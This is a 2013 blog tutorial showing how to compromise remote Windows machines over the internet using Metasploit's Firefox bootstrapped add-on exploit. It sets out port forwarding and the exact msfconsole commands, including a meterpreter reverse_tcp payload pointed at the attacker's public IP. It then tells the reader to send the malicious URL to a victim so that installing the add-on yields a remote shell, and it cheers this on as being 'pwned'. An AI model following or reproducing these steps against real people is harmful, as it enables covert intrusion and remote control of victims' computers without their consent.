Sunday, 11 August 2013

Hacking Remote Machines Using Firefox Bootstrapped Addon Of Metasploit Over WAN (Internet)

firefox bootstrapped addon attack

Metasploit has basically two type of exploits included in its database which are remote exploits and client side attacks.
Well in this tutorial, i will show you how to use metasploit's bootstrapped firefox addon over WAN (wide area network) or Internet.

Requirements:
  • Router (With Port Forwarding Support)
  • Metasploit Framework
Exploit Title: Firefox Bootstrapped Addon

I will use teamviewer to show you remote machine's ip and activities status.

Attacker's Public IP: 182.186.248.2

Attacker's Internal IP: 192.168.1.7
Attacker's Payload's LPORT: 7777
Victims IP: X.X.X.X

Step1: 
Forward following two ports for Attacker's internal IP which is 192.168.1.7:
  1. webserver port which is 8080 in my case ..in metasploit this defined by SRVPORT parameter
  2. payload port which is 7777 is in my case .. in metasploit it is defined by LHOST parameter
Step2: 
Now start msfconsole and use following exploit:

use exploit/multi/browser/firefox_xpi_bootstrapped_addon


use your public IP for LHOST parameter while remaining all parameters will get internal IP. Like this:


set srvhost 192.168.1.7
set srvport 8080
set uripath /
set payload windows/meterpreter/reverse_tcp
set lhost 182.186.248.2 set lport 7777

Step3:
Now send this server's address to victim: 
http://182.186.248.2:8080/

When victim will run this addon after installation, he/she will be pwned :)
You will get a reverse meterpreter session. Happy hacking :)

Watch Video Tutorial:
 

If you feel some trouble while following tutorial you may ask me in comments.